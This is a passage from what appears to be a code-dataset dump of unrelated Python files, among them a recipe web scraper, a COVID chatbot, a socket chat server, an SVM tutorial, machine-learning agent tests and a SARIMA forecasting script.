_check_input_not_mutated(self, func):\n @wraps(func)\n def check_not_mutated(*args, **kwargs):\n # Copy inputs to compare them to originals later.\n arg_copies = [(i, arg.copy()) for i, arg in enumerate(args)\n if isinstance(arg, (NDFrame, np.ndarray))]\n kwarg_copies = {\n k: v.copy() for k, v in iteritems(kwargs)\n if isinstance(v, (NDFrame, np.ndarray))\n }\n\n result = func(*args, **kwargs)\n\n # Check that inputs weren't mutated by func.\n for i, arg_copy in arg_copies:\n assert_allclose(\n args[i],\n arg_copy,\n atol=0.5 * 10 ** (-DECIMAL_PLACES),\n err_msg=\"Input 'arg %s' mutated by %s\"\n % (i, func.__name__),\n )\n for kwarg_name, kwarg_copy in iteritems(kwarg_copies):\n assert_allclose(\n kwargs[kwarg_name],\n kwarg_copy,\n atol=0.5 * 10 ** (-DECIMAL_PLACES),\n err_msg=\"Input '%s' mutated by %s\"\n % (kwarg_name, func.__name__),\n )\n\n return result\n\n return check_not_mutated\n","sub_path":"quantbear/tests/test_derivatives.py","file_name":"test_derivatives.py","file_ext":"py","file_size_in_byte":5169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"125620582","text":"#!/usr/bin/env cctbx.python\n\n# code to mend BKGINIT.py under special circumstances\n\nfrom __future__ import absolute_import, division, print_function\n\nimport binascii\nimport copy\nimport sys\n\nfrom cbflib_adaptbx import compress, uncompress\nfrom scitbx.array_family import flex\n\n\ndef recompute_BKGINIT(bkginit_in, init_lp, bkginit_out):\n\n start_tag = binascii.unhexlify(\"0c1a04d5\")\n\n data = open(bkginit_in, \"rb\").read()\n data_offset = data.find(start_tag) + 4\n cbf_header = data[: data_offset - 4]\n\n fast = 0\n slow = 0\n length = 0\n\n for record in cbf_header.split(\"\\n\"):\n if \"X-Binary-Size-Fastest-Dimension\" in record:\n fast = int(record.split()[-1])\n elif \"X-Binary-Size-Second-Dimension\" in record:\n slow = int(record.split()[-1])\n elif \"X-Binary-Number-of-Elements\" in record:\n length = int(record.split()[-1])\n\n assert length == fast * slow\n\n pixel_values = uncompress(packed=data[data_offset:], fast=fast, slow=slow)\n\n untrusted = []\n\n for record in open(init_lp):\n if \"UNTRUSTED_RECTANGLE=\" in record:\n untrusted.append(map(int, 
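# --- Hedged sketch (editor's addition): the tests above exercise a
# black_scholes(s, k, t, v, rf, call=...) function that is not shown. A
# standard closed-form implementation consistent with the expected value
# for (100, 100, 1, 0.2, 0) ~ 7.9656 would be (edge cases such as v == 0
# are not handled here):
from math import exp, log, sqrt
from scipy.stats import norm

def black_scholes(s, k, t, v, rf, call=True):
    d1 = (log(s / k) + (rf + 0.5 * v ** 2) * t) / (v * sqrt(t))
    d2 = d1 - v * sqrt(t)
    if call:
        return s * norm.cdf(d1) - k * exp(-rf * t) * norm.cdf(d2)
    return k * exp(-rf * t) * norm.cdf(-d2) - s * norm.cdf(-d1)

print(round(black_scholes(100, 100, 1, 0.2, 0), 4))  # 7.9656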
record.replace(\".\", \" \").split()[1:5]))\n\n modified_pixel_values = copy.deepcopy(pixel_values)\n\n for s in range(5, slow - 5):\n y = s + 1\n for f in range(5, fast - 5):\n x = f + 1\n trusted = True\n for x0, x1, y0, y1 in untrusted:\n if (x >= x0) and (x <= x1) and (y >= y0) and (y <= y1):\n trusted = False\n break\n\n if trusted:\n pixel = pixel_values[s * fast + f]\n if pixel < 0:\n pixels = []\n for j in range(-2, 3):\n for i in range(-2, 3):\n p = pixel_values[(s + j) * fast + f + i]\n if p > 0:\n pixels.append(p)\n modified_pixel_values[s * fast + f] = int(sum(pixels) / len(pixels))\n\n open(bkginit_out, \"wb\").write(\n cbf_header + start_tag + compress(modified_pixel_values)\n )\n\n return\n\n\nif __name__ == \"__main__\":\n\n recompute_BKGINIT(\"BKGINIT.cbf\", \"INIT.LP\", sys.argv[1])\n","sub_path":"modules/xia2/Toolkit/MendBKGINIT.py","file_name":"MendBKGINIT.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"605248941","text":"# Scraping file combs allrecipes.com for information on: recipe title, # people to make the \n# recipe, # of reviews, star rating, time to completion, ingredients, steps, and category. \n\nimport os, re, time, string\nimport numpy as np\nfrom selenium import webdriver\n\n_start_time = time.time()\n\ndef tic():\n global _start_time \n _start_time = time.time()\n\ndef toc():\n t_sec = round(time.time() - _start_time)\n (t_min, t_sec) = divmod(t_sec, 60)\n (t_hour,t_min) = divmod(t_min, 60) \n print('Time passed: {}hour:{}min:{}sec'.format(t_hour, t_min, t_sec))\n\ntic()\n\nchromedriver = '/usr/local/bin/chromedriver'\nos.environ['webdriver.chrome.driver'] = chromedriver\ndriver = webdriver.Chrome(chromedriver)\n\npages = ['https://www.allrecipes.com/recipes/233/world-cuisine/asian/indian/?page=' + str(p) for p in range(1,31)]\n\nfor j in pages:\n\n driver.get(str(j))\n\n fav = driver.find_elements_by_class_name('favorite')\n ids = []\n names = []\n urls = []\n for x in np.arange(len(fav)):\n ids.append(str(fav[x].get_attribute('data-id')))\n names.append(str(fav[x].get_attribute('data-name')))\n urls = ['https://allrecipes.com/recipe/' + id for id in ids] \n #print(urls)\n #print(len(urls))\n\n for i in urls: \n \n try:\n driver.get(str(i))\n\n recipetitle = driver.find_element_by_class_name('recipe-summary__h1').text\n\n madeitcount = driver.find_element_by_class_name('made-it-count').text\n\n reviewcount = driver.find_element_by_class_name('review-count').text\n reviewcount = str(re.findall('(\\w+) reviews', reviewcount)[0])\n\n starrating = driver.find_element_by_class_name('rating-stars').get_attribute('data-ratingstars')\n\n readyintime = driver.find_element_by_class_name('ready-in-time').text\n\n ingred = driver.find_elements_by_class_name('checkList__item')\n ingredients = []\n for x in np.arange(len(ingred)-1):\n ingredients.append(str(ingred[x].text))\n\n step = driver.find_elements_by_class_name('recipe-directions__list--item')\n steps = []\n for x in np.arange(len(step)-1):\n steps.append(str(step[x].text))\n\n cat = driver.find_elements_by_class_name('toggle-similar__title')\n categories = []\n for x in np.arange(len(cat)):\n categories.append(str(cat[x].text))\n \n print(recipetitle + ' | ' + madeitcount + ' | ' + reviewcount + ' | ' + starrating + ' | ' + readyintime + ' | ' + '; '.join(ingredients) + ' | ' + '; '.join(steps) + ' | ' + '; '.join(categories))\n\n except:\n 
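# --- Hedged sketch (editor's addition): recompute_BKGINIT above locates the
# binary payload by searching for the 0x0c1a04d5 start tag and parsing the
# ASCII header before it. The bookkeeping in isolation:
import binascii

start_tag = binascii.unhexlify('0c1a04d5')
data = b'X-Binary-Size-Fastest-Dimension 4\n' + start_tag + b'\x01\x02'
data_offset = data.find(start_tag) + len(start_tag)
header, payload = data[:data_offset - len(start_tag)], data[data_offset:]
print(header.decode().strip())  # X-Binary-Size-Fastest-Dimension 4
print(payload)                  # b'\x01\x02'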
continue\n\ndriver.quit()\n\ntoc()\n\n\n\n\n","sub_path":"scrape_allrecipes_indian.py","file_name":"scrape_allrecipes_indian.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"519391485","text":"from timer import *\nfrom timerclass import *\n\nmyTimer = timerclass(5)\nmyTimer.StartTimer()\nexit = 0\n\nwhile exit == 0:\n\tprint(\"0: Exit\")\n\tprint(\"1: Start timer\")\n\tprint(\"2: Stop timer\")\n\tprint(\"3: Stop alarm\")\n\tprint(\"4: Add timer (HHMM)\")\n\tprint(\"5: Check sound\")\n\n\taction = raw_input(\"Select action: \")\n\n\tif int(action) == 0:\n\t\tmyTimer.StopTimer()\n\t\texit = 1\n\telif int(action) == 1:\n\t\tmyTimer.StartTimer()\n\telif int(action) == 2:\n\t\tmyTimer.StopTimer()\n\telif int(action) == 3:\n\t\tmyTimer.StopAlarm()\n\telif int(action) == 4:\n\t\ttm = raw_input(\"Time HHMM \")\n\t\tmess = raw_input(\"Message \")\n\t\tmyTimer.AddTimer(int(tm), False, False, mess)\n\telif int(action) == 5:\n\t\tmyTimer.TestSound()\n","sub_path":"services/timer/testtimer.py","file_name":"testtimer.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"481224448","text":"#!/usr/bin/env python\n\n# # Leaflet cluster map of talk locations\n#\n# (c) 2016-2017 R. Stuart Geiger, released under the MIT license\n#\n# Run this from the _talks/ directory, which contains .md files of all your talks. \n# This scrapes the location YAML field from each .md file, geolocates it with\n# geopy/Nominatim, and uses the getorg library to output data, HTML,\n# and Javascript for a standalone cluster map.\n#\n# Requires: glob, getorg, geopy\n\nimport glob\nimport getorg\nfrom geopy import Nominatim\n\ng = glob.glob(\"*.md\")\n\n\ngeocoder = Nominatim(user_agent = 'talkmap-moshe')\nlocation_dict = {}\nlocation = \"\"\npermalink = \"\"\ntitle = \"\"\n\n\nfor file in g:\n with open(file, 'r') as f:\n lines = f.read()\n def get_field(field):\n n = lines.find(field + ': \"')\n if n < 2:\n return ''\n loc_start = n + len(field) + 3\n lines_trim = lines[loc_start:]\n loc_end = lines_trim.find('\"')\n return lines_trim[:loc_end]\n\n\n location = get_field('location')\n title = get_field('title')\n date = get_field('date')\n\n slug = file.rsplit('.', 1)[0]\n\n key = ';;'.join([slug, title, date, location])\n\n location_dict[key] = geocoder.geocode(location)\n print(key, \"\\n\", location_dict[key])\n\n\nm = getorg.orgmap.create_map_obj()\ngetorg.orgmap.output_html_cluster_map(location_dict, folder_name=\"../talkmap\", hashed_usernames=False)\n\n\n\n\n","sub_path":"talkmap.py","file_name":"talkmap.py","file_ext":"py","file_size_in_byte":1450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"37074279","text":"import warnings\n\nwith warnings.catch_warnings():\n warnings.filterwarnings(\"ignore\", category=FutureWarning)\n from tensorflow.keras.models import load_model\nimport nltk\nimport tensorflow as tf\nfrom snowballstemmer import TurkishStemmer\nimport numpy as np\nimport random\nimport json\n#import requests\n#import bs4\n\n#nltk.download('punkt')\n\n# Json dosyası olarak oluşturulan Covid-19 metin veri setini yükleme\nwith open(r\"covidDataset.json\", encoding=\"utf8\") as file:\n data = json.load(file)\n\n# Değişken tanımlamaları\nstemmer = TurkishStemmer()\nwords = []\nlabels = []\ndocs_x = []\ndocs_y = []\ntag = \" \"\nglobal cevap\n# Cümlelerin kelimelere ve 
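# --- Hedged sketch (editor's addition): the scraper above times the run with
# module-level tic()/toc() and a global start time. A context manager keeps
# the same hour:min:sec report without the global:
import time
from contextlib import contextmanager

@contextmanager
def stopwatch():
    start = time.time()
    yield
    t_sec = round(time.time() - start)
    t_min, t_sec = divmod(t_sec, 60)
    t_hour, t_min = divmod(t_min, 60)
    print('Time passed: {}hour:{}min:{}sec'.format(t_hour, t_min, t_sec))

with stopwatch():
    time.sleep(1)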
etiketlere ayrılması\nfor intent in data[\"intents\"]:\n    for pattern in intent[\"patterns\"]:\n        wrds = nltk.word_tokenize(pattern)\n        words.extend(wrds)\n        docs_x.append(wrds)\n        docs_y.append(intent[\"tag\"])\n\n        if intent[\"tag\"] not in labels:\n            labels.append(intent[\"tag\"])\n\n# Cümlelerin küçük harfe alınması ve ayrılması\nwords = [stemmer.stemWord(w.lower()) for w in words if w != \"?\"]\nwords = sorted(list(set(words)))\n\n# Etiketlerin alfabetik sıralanması\nlabels = sorted(labels)\n\n# Eğitilmiş ağırlık dosyasının yüklenmesi.\n\nmodel = load_model('covid.h5')\n\n\n# Buradaki fonksiyon bot ile konuşan kişinin cümlelerini 1 ve 0'lar ile ifade etmesine yarıyor.\ndef bag_of_words(s, words):\n    bag = [0 for _ in range(len(words))]\n    s_words = nltk.word_tokenize(s)\n    s_words = [stemmer.stemWord(word.lower()) for word in s_words]\n    for se in s_words:\n        for i, w in enumerate(words):\n            if w == se:\n                bag[i] = 1\n    #print(np.array(bag))\n    return np.array(bag)\n\n\n# Sohbet fonksiyonu\ndef chat(message):\n\n    results = model.predict(np.asanyarray([bag_of_words(message, words)]))[0]\n    # print(results)\n    results_index = np.argmax(results)\n    # print(\"label sayısı\",len(labels))\n    tag = labels[results_index]\n    # print(\"etiket\",tag)\n    # print(\"tahmin\",results[results_index] )\n    if results[results_index] > 0.85:\n        for tg in data[\"intents\"]:\n            if tg['tag'] == tag:\n                responses = tg['responses']\n                return [random.choice(responses), tag]\n    else:\n        return [\"Tam olarak anlayamadım\", \"bulanamadı\"]\n\n\ndef cevapla(mesaj):\n    cevap = chat(mesaj)\n    print(\"*****************\", cevap)\n    return cevap\n","sub_path":"chatMain.py","file_name":"chatMain.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"615770441","text":"# -*- coding: utf-8 -*-\n\"\"\"\n    Main page views.\n\"\"\"\n\n__author__ = \"Mikko Ohtamaa \"\n__copyright__ = \"mFabrik Research Oy\"\n__license__ = \"BSD\"\n__docformat__ = \"epytext\"\n\n# Python standard library imports\nimport os\nimport logging\n\n# Appengine imports\nfrom google.appengine.ext.webapp import template\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp.util import run_wsgi_app\n\n\nclass PigPage(webapp.RequestHandler):\n    \"\"\"Base class for page renderer\"\"\"\n\n    def render_page(self, template_file_name):\n        \"\"\" Render a page template from templates folder\"\"\"\n\n        # Fill in template parameters\n        vars = {}\n\n        path = os.path.join(os.path.dirname(__file__), 'templates', template_file_name)\n        self.response.out.write(template.render(path, vars))\n\n\nclass MainPage(PigPage):\n    \"\"\"Index page of the site\"\"\"\n\n    def get(self):\n        self.render_page(\"main.html\")\n\n\nclass AboutPage(PigPage):\n    def get(self):\n        self.render_page(\"about.html\")\n\n\nclass InEnglishPage(PigPage):\n    def get(self):\n        self.render_page(\"english.html\")\n\n\nclass CompaniesPage(PigPage):\n    def get(self):\n        self.render_page(\"companies.html\")\n\n\nclass BlogsPage(PigPage):\n    def get(self):\n        self.render_page(\"blogs.html\")\n\n\nclass JobsPage(PigPage):\n    def get(self):\n        self.render_page(\"jobs.html\")\n\n\nclass LearnPage(PigPage):\n    def get(self):\n        self.render_page(\"learn.html\")\n\n\nclass NotFound(PigPage):\n    \"\"\"Handle URIs not found\"\"\"\n    def get(self):\n        self.render_page(\"404.html\")\n\n\napplication = webapp.WSGIApplication([\n    ('/about', AboutPage),\n    ('/english', InEnglishPage),\n    ('/companies', 
CompaniesPage),\n ('/blogs', BlogsPage),\n ('/jobs', JobsPage),\n ('/learn', LearnPage),\n ('/', MainPage),\n ('/.*', NotFound),\n], debug=True)\n\n\ndef main():\n logging.getLogger().setLevel(logging.DEBUG)\n run_wsgi_app(application)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"592533313","text":"from intcode import Program\nimport random\n\n\ndef limits(state):\n xMin, xMax, yMin, yMax = 0, 0, 0, 0\n for x, y in state:\n xMin = min(xMin, x)\n xMax = max(xMax, x)\n yMin = min(yMin, y)\n yMax = max(yMax, y)\n return xMin, xMax, yMin, yMax\n\n\ndef display(state, dead, pos):\n xMin, xMax, yMin, yMax = limits(state)\n output = []\n for j in range(yMax + 1 - yMin):\n y = yMin + j\n row = []\n for i in range(xMax + 1 - xMin):\n x = xMin + i\n p = (x, y)\n if x == pos[0] and y == pos[1]:\n row.append('@')\n elif x == 0 and y == 0:\n row.append('x')\n elif p not in state:\n row.append(' ')\n elif state[p] == 0:\n row.append('#')\n elif state[p] == 1:\n if p in dead:\n row.append('-')\n else:\n row.append('.')\n elif state[p] == 2:\n row.append('o')\n else:\n raise Exception(\"This shouldn't happend right\")\n output.append(''.join(row))\n output.append('\\n')\n return '\\n'.join(output)\n\n\ndef update_position(pos, direction):\n x, y = pos\n if direction == 1:\n return (x, y - 1)\n elif direction == 2:\n return (x, y + 1)\n elif direction == 3:\n return (x - 1, y)\n elif direction == 4:\n return (x + 1, y)\n else:\n raise Exception('Unknown direction')\n\n\ndef dead_options(pos, dead):\n count = 0\n for d in range(1, 5):\n opt_pos = update_position(pos, d)\n if opt_pos not in dead:\n count += 1\n return count < 2\n\n\ndef pick_direction(pos, prev, state, dead):\n options = []\n for d in range(1, 5):\n opt_pos = update_position(pos, d)\n if opt_pos not in state:\n return d\n if opt_pos not in dead:\n options.append(d)\n back_direction = -1\n if prev == 1:\n back_direction = 2\n elif prev == 2:\n back_direction = 1\n elif prev == 3:\n back_direction = 4\n elif prev == 4:\n back_direction = 3\n if len(options) == 0:\n return None\n elif len(options) > 1 and back_direction in options:\n options.remove(back_direction)\n return random.choice(options)\n\n\ndef solve(memory):\n program = Program(memory, [])\n state = {}\n pos = (0, 0)\n direction = 2\n oxygen_pos = None\n steps = 0\n distances = {pos: steps}\n dead = set()\n while not program.halted:\n new_pos = update_position(pos, direction)\n program.append(direction)\n program.run()\n if program.awaiting_input:\n status = program.pop()\n if status == 0:\n state[new_pos] = 0\n # don't update pos\n dead.add(new_pos)\n elif status == 1 or status == 2:\n state[new_pos] = 1\n pos = new_pos\n if dead_options(pos, dead):\n dead.add(pos)\n steps += 1\n if pos in distances:\n if distances[pos] < steps:\n steps = distances[pos]\n else:\n distances[pos] = steps\n else:\n distances[pos] = steps\n if status == 2:\n oxygen_pos = pos\n else:\n raise Exception('Bad status')\n direction = pick_direction(pos, direction, state, dead)\n if direction is None:\n break\n if oxygen_pos is not None:\n print(distances[oxygen_pos])\n print(display(state, dead, pos))\n return distances[oxygen_pos]\n\n\ndef read(filename):\n memory = {}\n with open(filename, 'r') as f:\n for k, n in enumerate(f.readline().split(',')):\n memory[k] = int(n)\n return memory\n\n\ndef main(filename):\n 
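# solve() already prints the distance and a rendering of the maze; main() prints the returned distance once more\n    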
print(solve(read(filename)))\n\n\nif __name__ == \"__main__\":\n import sys\n if (len(sys.argv) < 2):\n print('missing input parameter')\n exit()\n for f in sys.argv[1:]:\n main(f)\n","sub_path":"15/first.py","file_name":"first.py","file_ext":"py","file_size_in_byte":4153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"253648703","text":"from sklearn import svm\n\n#an array X of size [n_samples, n_features]\n#holding the training samples\nX = [[0, 0], [1, 1]]\n\n#an array y of class labels (strings or integers), size [n_samples]\ny = [0, 1]\n\n\nclf = svm.SVC()\nclf.fit(X, y)\n\n#the model can then be used to predict new values\nprint(clf.predict([[2., 2.]]))#ans:- [1]\n\nprint(clf.predict([[.3, .3]]))#ans:- [0]\n\n# get support vectors\nprint(clf.support_vectors_)\n# array([[ 0., 0.],\n# [ 1., 1.]])\n# get indices of support vectors\nprint(clf.support_) \n#array([0, 1]...)\n# get number of support vectors for each class\nprint(clf.n_support_) \n#array([1, 1]...)\n\n#parameters of svm\n# sklearn.svm.SVC(\n# C=1.0, kernel='rbf', degree=3, \n# gamma=0.0, coef0=0.0, shrinking=True, \n# probability=False,tol=0.001, cache_size=200, \n# class_weight=None, verbose=False, max_iter=-1, \n# random_state=None)\n\n# kernel --> options are “linear”, “rbf”,”poly” \n# and others (default value is “rbf”). Here “rbf” \n# and “poly” are useful for non-linear hyper-plane.\n\n#-----------------------------------------------------------------------#\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib import style\nstyle.use(\"ggplot\")\nfrom sklearn import svm\n\n#let's consider that we have two features to consider. \n#These features will be visualized as axis on our graph\n\nx = [1, 5, 1.5, 8, 1, 9]\ny = [2, 8, 1.8, 8, 0.6, 11]\n\nplt.scatter(x,y)\nplt.show()\n\n#feature list\nX = np.array([[1,2],\n [5,8],\n [1.5,1.8],\n [8,8],\n [1,0.6],\n [9,11]])\n\n#Now as this is supervised learning we have label for each data\n#we have two labels 0 and 1 \n#For our labels, \"targets,\" will be \nY = [0,1,0,1,0,1]\n#so point_1 is in 0 label, then point_2 is in 1 label, point_3 is in 0 label \n#and so on and so forth\n#our classifier is \nclf = svm.SVC(kernel='linear', C = 1.0)\nclf.fit(X,Y)\n\n#we can predict and test. 
Let's print a prediction\nprint(clf.predict([[0.58,0.76]]))#label 0\nprint(clf.predict([[10.58,10.76]]))#label 1\n\n\n","sub_path":"pymining/jay/svm.py","file_name":"svm.py","file_ext":"py","file_size_in_byte":2110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"37334515","text":"import socketserver\nimport threading\n \nADDRESS = ('127.0.0.1', 8712) # 绑定地址\n \ng_conn_pool = [] # 连接池\n \nclass ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):\n \n    def setup(self):\n        self.request.sendall("连接服务器成功!".encode(encoding='utf8'))\n        # 加入连接池\n        g_conn_pool.append(self.request)\n \n    def handle(self):\n        while True:\n            try:\n                bytes = self.request.recv(1024)\n                print("客户端消息:", bytes.decode(encoding="utf8"))\n            except: # 意外掉线\n                self.remove()\n                break\n \n    def finish(self):\n        print("清除了这个客户端。")\n \n    def remove(self):\n        print("有一个客户端掉线了。")\n        g_conn_pool.remove(self.request)\n \n \nclass ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):\n    pass\n \n \nif __name__ == '__main__':\n    server = ThreadedTCPServer(ADDRESS, ThreadedTCPRequestHandler)\n    # 新开一个线程运行服务端\n    server_thread = threading.Thread(target=server.serve_forever)\n    server_thread.daemon = True\n    server_thread.start()\n \n    # 主线程逻辑\n    while True:\n        cmd = input("""--------------------------\n输入1:查看当前在线人数\n输入2:给指定客户端发送消息\n输入3:关闭服务端\n""")\n        if cmd == '1':\n            print("--------------------------")\n            print("当前在线人数:", len(g_conn_pool))\n        elif cmd == '2':\n            print("--------------------------")\n            index, msg = input("请输入“索引,消息”的形式:").split(",")\n            g_conn_pool[int(index)].sendall(msg.encode(encoding='utf8'))\n        elif cmd == '3':\n            server.shutdown()\n            server.server_close()\n            exit()","sub_path":"Python/socket处理多客户端连接/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"407047786","text":"# Copyright 2017 reinforce.io. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport unittest\n\nfrom tensorforce import Configuration\nfrom tensorforce.agents import RandomAgent\nfrom tensorforce.environments.minimal_test import MinimalTest\nfrom tensorforce.execution import Runner\nfrom tensorforce.tests import reward_threshold\n\n\nclass TestRandomAgent(unittest.TestCase):\n\n def test_discrete(self):\n environment = MinimalTest(definition=False)\n config = Configuration(\n states=environment.states,\n actions=environment.actions\n )\n agent = RandomAgent(config=config)\n runner = Runner(agent=agent, environment=environment)\n\n def episode_finished(r):\n return r.episode < 100 or not all(x / l >= 0.9 for x, l in zip(r.episode_rewards[-100:], r.episode_lengths[-100:]))\n\n runner.run(episodes=1000, episode_finished=episode_finished)\n print('Random agent (discrete): ' + str(runner.episode))\n self.assertTrue(runner.episode == 1000)\n\n def test_continuous(self):\n environment = MinimalTest(definition=True)\n config = Configuration(\n states=environment.states,\n actions=environment.actions\n )\n agent = RandomAgent(config=config)\n runner = Runner(agent=agent, environment=environment)\n\n def episode_finished(r):\n return r.episode < 100 or not all(x / l >= reward_threshold for x, l in zip(r.episode_rewards[-100:],\n r.episode_lengths[-100:]))\n\n runner.run(episodes=1000, episode_finished=episode_finished)\n print('Random agent (continuous): ' + str(runner.episode))\n self.assertTrue(runner.episode == 1000)\n\n def test_multi(self):\n environment = MinimalTest(definition=[False, (False, 2), (False, (1, 2)), (True, (1, 2))])\n config = Configuration(\n states=environment.states,\n actions=environment.actions\n )\n agent = RandomAgent(config=config)\n runner = Runner(agent=agent, environment=environment)\n\n def episode_finished(r):\n return r.episode < 20 or not all(x / l >= reward_threshold for x, l in zip(r.episode_rewards[-20:],\n r.episode_lengths[-20:]))\n\n runner.run(episodes=1000, episode_finished=episode_finished)\n print('Random agent (multi-state/action): ' + str(runner.episode))\n self.assertTrue(runner.episode == 1000)\n","sub_path":"tensorforce/tests/test_random_agent.py","file_name":"test_random_agent.py","file_ext":"py","file_size_in_byte":3296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"77580046","text":"import numpy as np\nfrom pymongo import MongoClient\nimport os\n\n#function for inserting accession information into database\ndef insert_accession_info(file):\n #open file\n accession_file=\"./accession/\"+file\n sup_temp=np.loadtxt(open(accession_file,'r'),delimiter=\"\\n\",dtype=np.str)\n #connect to database\n client=MongoClient()\n db=client.emdb\n accession_collection=db.data_experiment_info\n 
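# the accession file holds one metadata value per line, in a fixed order that is mapped onto named fields below\n    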
accession_info={\"Accession_number\":sup_temp[0],\n \"Created_time\":sup_temp[1],\n \"Updated_time\":sup_temp[2],\n \"Method_category\":sup_temp[3],\n \"Method_detail\":sup_temp[4],\n \"Raw_data\":sup_temp[5],\n \"Species\":sup_temp[6],\n \"Reference_genome_version\":sup_temp[7],\n \"Cutoff\":sup_temp[8],\n \"Literature\":sup_temp[9],\n \"Doi\":sup_temp[10]\n }\n accession_collection.insert_one(accession_info)\n print(\"Finish %s\" % file)\n\nfor file_name in os.listdir(\"./accession\"):\n insert_accession_info(file_name)\nprint(\"Finish All.\")","sub_path":"Data_integration/accession2db.py","file_name":"accession2db.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"495487460","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 3 15:03:57 2021\n\n@author: victorhuynh\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\nfrom statsmodels.tsa.statespace.sarimax import SARIMAX\n\n\n\ndef ordre_SARIMA(histoMod, dateDebMod, dateFinMod):\n \n histoMod = histoMod.reset_index(drop = True)\n coupe = np.where(histoMod['Date'] == dateFinMod)[0][0]\n train = histoMod[histoMod.index <= coupe]\n \n stepwise_fit = auto_arima(train['PAX'], start_p=0, start_q=0,\n max_p=3, max_q=3, m=12,\n start_P=0, seasonal=True,\n d=None, D=1, trace=True,\n error_action='ignore', \n suppress_warnings=True, \n stepwise=True,\n information_criterion = 'bic')\n\n return stepwise_fit.order, stepwise_fit.seasonal_order\n\n\n\n### Validité des modèles\n\nimport statsmodels.api as sm\n\ndatabase = pd.read_csv(\"/Users/victorhuynh/Documents/ENSAE/ENSAE 2A/2A S2/Stat App/StatApp_2020/Data/database_sieges.csv\",low_memory=False,decimal=',')\ndatabase = database.astype({'Date': 'datetime64[ns]','PAX_FQM':'float','Sièges Corrections_ICI':'float','Coeff_Rempl':'float','Coeff_Rempl_FQM':'float'})\ndatabase = database.groupby(['Date','Faisceau','ArrDep']).agg({'PAX':'sum','PAX_FQM':'sum','Sièges Corrections_ICI':'sum','Coeff_Rempl':'mean','Coeff_Rempl_FQM':'mean'}).reset_index()\n\ndateDebMod = pd.to_datetime(\"2007-01-01\")\ndateFinMod = pd.to_datetime(\"2016-01-15\")\n\nhistoMod = database[(database['Date']>=dateDebMod) & (database['Date']<=dateFinMod)]\nhistoMod = histoMod[(histoMod['Faisceau']=='Autre UE') & (histoMod['ArrDep']=='Départ')]\n#A ré-adapter selon le faisceau et le type de mouvement qu'on étudie\n\nhistoMod = histoMod.reset_index(drop = True)\ncoupe = np.where(histoMod['Date'] == dateFinMod)[0][0]\ntrain = histoMod[histoMod.index <= coupe]\n \nordres, ordres_sais = ordre_SARIMA(histoMod, dateDebMod, dateFinMod)\nres = SARIMAX(train['PAX'], order = ordres, seasonal_order = ordres_sais).fit(disp = 0)\n\nsm.stats.acorr_ljungbox(res.resid, lags=12, return_df=True) #Test de Ljung-Box pour l'autocorrélation des résidus\nres.summary() #Pour voir la significativité des coefficients\n\nres = SARIMAX(train['PAX'], order = (0,0,2), seasonal_order = (1, 1, 1, 12)).fit(disp = 0)\nsm.stats.acorr_ljungbox(res.resid, lags=2*12, return_df=True, model_df=2) \n\nfrom scipy import stats\nlj = sm.stats.acorr_ljungbox(res.resid, lags = 10)\ncorrected_pval = stats.chi2.sf(lj[-1], 24 - 2)\nprint(corrected_pval)\n\n\n","sub_path":"Modélisation/Ordre optimal SARIMA et validite.py","file_name":"Ordre optimal SARIMA et validite.py","file_ext":"py","file_size_in_byte":2583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"481132369","text":"import RPi.GPIO as 
